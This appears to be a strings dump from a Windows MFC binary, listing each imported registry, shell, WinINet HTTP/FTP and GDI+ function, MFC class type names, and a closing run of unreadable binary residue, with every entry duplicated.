RegEnumKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyW

RegEnumKeyW

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

COMCTL32.dll

COMCTL32.dll

UrlUnescapeW

UrlUnescapeW

SHLWAPI.dll

SHLWAPI.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

oledlg.dll

oledlg.dll

OLEACC.dll

OLEACC.dll

InternetCrackUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpOpenRequestW

HttpSendRequestW

HttpSendRequestW

HttpQueryInfoW

HttpQueryInfoW

InternetCanonicalizeUrlW

InternetCanonicalizeUrlW

FtpDeleteFileW

FtpDeleteFileW

FtpRenameFileW

FtpRenameFileW

FtpCreateDirectoryW

FtpCreateDirectoryW

FtpRemoveDirectoryW

FtpRemoveDirectoryW

FtpSetCurrentDirectoryW

FtpSetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpPutFileW

FtpPutFileW

FtpGetFileW

FtpGetFileW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpEndRequestW

HttpEndRequestW

HttpSendRequestExW

HttpSendRequestExW

FtpOpenFileW

FtpOpenFileW

FtpCommandW

FtpCommandW

FtpFindFirstFileW

FtpFindFirstFileW

InternetOpenUrlW

InternetOpenUrlW

WININET.dll

WININET.dll

GdiplusShutdown

GdiplusShutdown

gdiplus.dll

gdiplus.dll

IMM32.dll

IMM32.dll

WINMM.dll

WINMM.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCException@@

.PAVCException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCResourceException@@

.?AVCFtpFileFind@@

.?AVCFtpFileFind@@

.?AVCFtpConnection@@

.?AVCFtpConnection@@

.?AVCHttpConnection@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCToolCmdUI@@

.?AVCToolCmdUI@@

.?AVCMDITabProxyWnd@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMDIFrameWnd@@

.?AVCMFCToolBarCmdUI@@

.?AVCMFCToolBarCmdUI@@

.?AVCKeyboardManager@@

.?AVCKeyboardManager@@

.PAVCOleDispatchException@@

.PAVCOleDispatchException@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonCmdUI@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AVCMFCWindowsManagerDialog@@

.?AVCMFCWindowsManagerDialog@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AVCMFCCmdUsageCount@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AVCMFCColorBarCmdUI@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCAcceleratorKey@@

.?AVCHotKeyCtrl@@

.?AVCHotKeyCtrl@@

.?AVCMFCRibbonKeyTip@@

.?AVCMFCRibbonKeyTip@@

.?AVCOleCmdUI@@

.?AVCOleCmdUI@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AVCMFCToolBarsKeyboardPropertyPage@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCTasksPaneToolBarCmdUI@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCRibbonKeyboardCustomizeDialog@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

.?AVCMFCAcceleratorKeyAssignCtrl@@

zcÁ

zcÁ

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.PAVCFileException@@

.PAVCFileException@@

.PAVCInternetException@@

.PAVCInternetException@@

X!CCA[ttJBoorLbbH~mm1gNNwWww1g00JyggK gglIttG3MMBnoo4MNNhvllvL00O'WW2add1?XXc~jj4]ooKuSSA)XXNDVVu(ppJcEE6 mmKxgg89nnH?nn4EXX2dUU16vvsiLLZ(vvx$jj38CCfeee3$ppNCjjg_xxfEggZXWWr{jjw^uuwd66N,jjGuXX2{ppz"llb%WWe5llG3WW1awwV%mmv8II6dbbcllaivvwRqqwwwwweddy7oozIXXkNvvwtRRh*QQZ]VVWKnnA2wwPVSSf)ggdPSSG/gg1?XXwC33oFxxx.ggaXQQv2ttN XXA}ddBruueqLLueSSwpNNpibbGxlluVuux?dd8,QQc$ddzlllJvjjB,ggd 66r)ppJoIIADxxw RRophhJ,RRT8ggw7ddd0ccJ5XXPxnnJ/uu1iWWwfIIocll33uu2{ood1xxZZllNTXXpSCCe%IIvpWWwrNNB4SSGoVVBwwwJ.XXz&nnZVxxglWWZHxx2pWWf}XXw&WWr/VV1gllBBwwEymme&VVl mmZRnnqMkkruFF3`ccNUggIOppsdLLoKmmHGggHwWWvURsnnNyNNu>XXf$xxTIppfEbb5=ooG4XXP8XXcjqqq2WWvGRRvoWWfnVVMqllf-RRLRuuc%jjw9ll4Yddz_XXfsooNwooB.nnshbbJ(bb6#uuH/ggw(kkz?jj1Tbbv'oo2XCCvxxHhXXHm33eDxx25112/xxJB66yGggc:ttRpggcVnnkxnn4RxxlGSSG,qqIYhhJzjj5cppw@33gFnn3!NNm*bbc!jjqvXXr?ggsPppfYNNWXmmfPIIR"hhJw66pHQQeMttJ@jjeAXXOFmmeWII6.oow/LLGpuuwuUUZ[vvdMHH1YppNSlllfuuAQLLH?SS4:ee4}jjG ee3Fkke#IIP@xxzJggjhttc%qq4AXXp&ggOKwwd$llG8pp4$bb6Tmme